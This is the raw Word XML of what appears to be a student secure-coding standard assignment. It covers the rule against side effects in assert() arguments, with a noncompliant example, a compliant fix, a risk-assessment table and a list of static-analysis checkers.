              <w:t xml:space="preserve">This noncompliant code example includes an </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>assert(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) macro containing an expression (index++) that has a side effect:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="058CAEAA" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0EF35177" w14:textId="77777777" w:rsidR="002A03E4" w:rsidRDefault="002A03E4" w:rsidP="002A03E4">
            <w:r>
              <w:t>#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>assert.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2788FC14" w14:textId="77777777" w:rsidR="002A03E4" w:rsidRDefault="002A03E4" w:rsidP="002A03E4">
            <w:r>
              <w:t>#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>stddef.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D3B476F" w14:textId="77777777" w:rsidR="002A03E4" w:rsidRDefault="002A03E4" w:rsidP="002A03E4">
            <w:r>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="763041B1" w14:textId="77777777" w:rsidR="002A03E4" w:rsidRDefault="002A03E4" w:rsidP="002A03E4">
            <w:r>
              <w:t xml:space="preserve">void </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>process(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>size_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> index) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3455115F" w14:textId="77777777" w:rsidR="002A03E4" w:rsidRDefault="002A03E4" w:rsidP="002A03E4">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>assert(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>index++ &gt; 0); /* Side effect */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E883CE8" w14:textId="77777777" w:rsidR="002A03E4" w:rsidRDefault="002A03E4" w:rsidP="002A03E4">
            <w:r>
              <w:t xml:space="preserve">  /* ... */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28BA138C" w14:textId="0B95707E" w:rsidR="00F72634" w:rsidRDefault="002A03E4" w:rsidP="002A03E4">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01156A35"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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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6FFC75E" w:rsidR="00F72634" w:rsidRDefault="002A03E4" w:rsidP="00A72503">
            <w:r w:rsidRPr="002A03E4">
              <w:t xml:space="preserve">This compliant solution avoids the possibility of side effects in assertions by moving the expression containing the side effect outside of the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002A03E4">
              <w:t>assert(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002A03E4">
              <w:t>) macro.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="2DA5938A" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5DD25EF5" w14:textId="77777777" w:rsidR="003F0E73" w:rsidRDefault="003F0E73" w:rsidP="003F0E73">
            <w:r>
              <w:t>#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>assert.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A91D21D" w14:textId="77777777" w:rsidR="003F0E73" w:rsidRDefault="003F0E73" w:rsidP="003F0E73">
            <w:r>
              <w:t>#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>stddef.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77369F10" w14:textId="77777777" w:rsidR="003F0E73" w:rsidRDefault="003F0E73" w:rsidP="003F0E73">
            <w:r>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="058124AC" w14:textId="77777777" w:rsidR="003F0E73" w:rsidRDefault="003F0E73" w:rsidP="003F0E73">
            <w:r>
              <w:t xml:space="preserve">void </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>process(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>size_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> index) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="466897B3" w14:textId="77777777" w:rsidR="003F0E73" w:rsidRDefault="003F0E73" w:rsidP="003F0E73">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>assert(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>index &gt; 0); /* No side effect */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3590973A" w14:textId="77777777" w:rsidR="003F0E73" w:rsidRDefault="003F0E73" w:rsidP="003F0E73">
            <w:r>
              <w:t xml:space="preserve">  ++</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>index;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="070666D0" w14:textId="77777777" w:rsidR="003F0E73" w:rsidRDefault="003F0E73" w:rsidP="003F0E73">
            <w:r>
              <w:t xml:space="preserve">  /* ... */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E312001" w14:textId="1BA2EBC4" w:rsidR="00F72634" w:rsidRDefault="003F0E73" w:rsidP="003F0E73">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4419F26B" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00B475A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3275D22E" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="54BB6B49">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Int_iwh6HiS8"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Note: Stop here for the milestone. Complete this section for Project One in Module Six.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>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4B541FA" w14:textId="77777777" w:rsidR="0051643C" w:rsidRDefault="00B475A1" w:rsidP="54BB6B49">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r w:rsidR="009A5D3E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> 4.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00DD5F74">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Keep It Simple</w:t>
            </w:r>
            <w:r w:rsidR="00DD5F74">
              <w:t>: Avoiding side effects in macro arguments simplifies code behavior and reduces the likelihood of unintended consequences or vulnerabilities stemming from unexpected evaluations or behaviors of macros.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D0D0A59" w14:textId="3524C2E6" w:rsidR="0051643C" w:rsidRPr="00A74133" w:rsidRDefault="0051643C" w:rsidP="0051643C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0051643C">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9.</w:t>
            </w:r>
            <w:r w:rsidRPr="0051643C">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">  Use Effective Quality Assurance Techniques</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="00A74133">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A74133">
              <w:t>Effective QA techniques, such as static analysis and code reviews, can help identify unsafe macro usage and side effects. This ensures that macros are used safely, complying with the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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51B951B3" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D802076" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="476A1FF1" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D58288E" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="599F0FE9" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="325BC76A" w14:textId="1FB1F674" w:rsidR="00B475A1" w:rsidRDefault="005A1B7A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05FDEF4C" w14:textId="4E4866D8" w:rsidR="00B475A1" w:rsidRDefault="005A1B7A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79D1FC84" w14:textId="5A48854E" w:rsidR="00B475A1" w:rsidRDefault="005A1B7A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07D13FDB" w14:textId="2FAB31FE" w:rsidR="00B475A1" w:rsidRDefault="005A1B7A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="018B5741" w14:textId="26E27D30" w:rsidR="00B475A1" w:rsidRDefault="005A1B7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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="398A9F91" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16184D8D" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D63E5D3" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C529D" w14:paraId="5A9F8899" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DA4B85F" w14:textId="6E9D4865" w:rsidR="007C529D" w:rsidRDefault="00000000" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId89" w:history="1">
              <w:r w:rsidR="007C529D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Astrée</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0341C452" w14:textId="4CBAD752" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>24.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D152CEC" w14:textId="47B28EFA" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>expanded-side-effect-multiplied</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>expanded-side-effect-not-evaluated</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>side-effect-not-expanded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="006916E2" w14:textId="06687B25" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Partially checked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C529D" w14:paraId="6E8F2B50" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3548427C" w14:textId="1685BA6A" w:rsidR="007C529D" w:rsidRDefault="00000000" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId90" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="007C529D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Axivion</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="007C529D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bauhaus Suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="302B5568" w14:textId="65C3D506" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>7.2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09783FC4" w14:textId="6030873F" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CertC-PRE31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6532F288" w14:textId="53DA540D" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Fully implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C529D" w14:paraId="12B52FF5" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="057D8916" w14:textId="570ED565" w:rsidR="007C529D" w:rsidRDefault="00000000" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId91" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="007C529D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CodeSonar</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C00CF8F" w14:textId="54270140" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>8.1p0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06276E21" w14:textId="660386E3" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>LANG.PREPROC.FUNCMACRO</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>LANG.STRUCT.SE.DEC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
